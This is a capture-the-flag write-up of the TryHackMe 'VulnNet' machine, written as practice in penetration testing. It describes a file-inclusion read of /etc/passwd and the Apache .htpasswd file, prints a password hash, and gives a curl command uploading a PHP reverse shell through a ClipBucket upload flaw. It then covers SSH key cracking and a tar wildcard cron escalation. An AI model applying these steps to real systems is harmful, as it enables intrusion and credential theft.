πΆ{THM} VulnNet
Last updated
Last updated
The purpose of this challenge is to make use of more realistic techniques and include them into a single machine to practice your skills.
Difficulty: Medium
Web Language: PHP
You will have to add a machine IP with domain vulnnet.thm to your /etc/hosts
Before we start, as mentioned in the introduction, we need to add this machine to out hosts.
As we can see, it appears to have only 2 open port. Let moving!
On the landing page, this machine happen to have normal without any suspicious. But always remember to check source code!!
On source code part, it have something weird javascript. For this part I use tool LinkFinder.
We found another subdomain. At this moment, my FFUF not working (still figure out).. let put new subdomains into our hosts.
Browsing new subdomains prompts a Basic Authentication login screen. We do not have the credentials yet. However, we can abuse the referrer parameter in the URL. You can read the contents of the /etc/passwd of the machine by running:
From here, we can found some juicy information such as backups and server-management that can be use for next part.
Since we know this machine use apache web server, the credentials might happen to store in /etc/apache2/.htpasswd and we manage to get credentials.
developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0
Let decrypt the hash using favorite tool all-time.
YEsshhh, we manage to get password and username, let insert to prompt login.
The title of the page shows ClipBucket v4.0, an Open Source OTT, VOD and Enterprise Video Hosting Solution. Using searchsploit, we can identify a critical vulnerability where this exploit is an unauthenticated file upload vulnerability.
Let prepare our arbitrary file using revshell and use command that been mention in cheatsheet clipbucket.
curl -F "file=@php-reverse-shell.php" -F "plupload=1" -F "name=php-reverse-shell.php" http://broadcast.vulnnet.thm/actions/beats_uploader.php -u developers:<REDACTED>
Where the heck do I know where to upload?? Just read and follow POC given. Once it shows successfully let proceed to where file locate and execute our file. Notice the name has already changed. And always listen before executing the shell.
We manage to exploit this machine as www-data.
Do we remember our past find out on /etc/passwd. Let proceed to backups dir first. But before that, always stable your shell since this is raw shell.
We found lot of backup file here and the most favorite is ssh. WOW. Let copy into /tmp file since we need to unzip and copy the content. Next in our machine, let crack this id_rsa.
Let use our ssh2john to create hash file and crack using john. Before that, always change into 600 permission.
Once we manage to crack the password, let login as ssh user.
ssh -i id_rsa server-management@vulnnet.thm
We manage to get access as server-management and get the user flag.
Since we cannot check sudo permission since we don't have password, let check their crontab.
There is a wildcard vulnerability. Whenever you use tar with a wildcard, you can create files that get executed. Run the following commands to obtain access to the root user.
Waiting for the script to run, in this case it set every 2 minutes.
We manage to get root flag.
Figure out new script to fuzz hidden directory (linkfinder) (to be proof more)
New escalation using tar
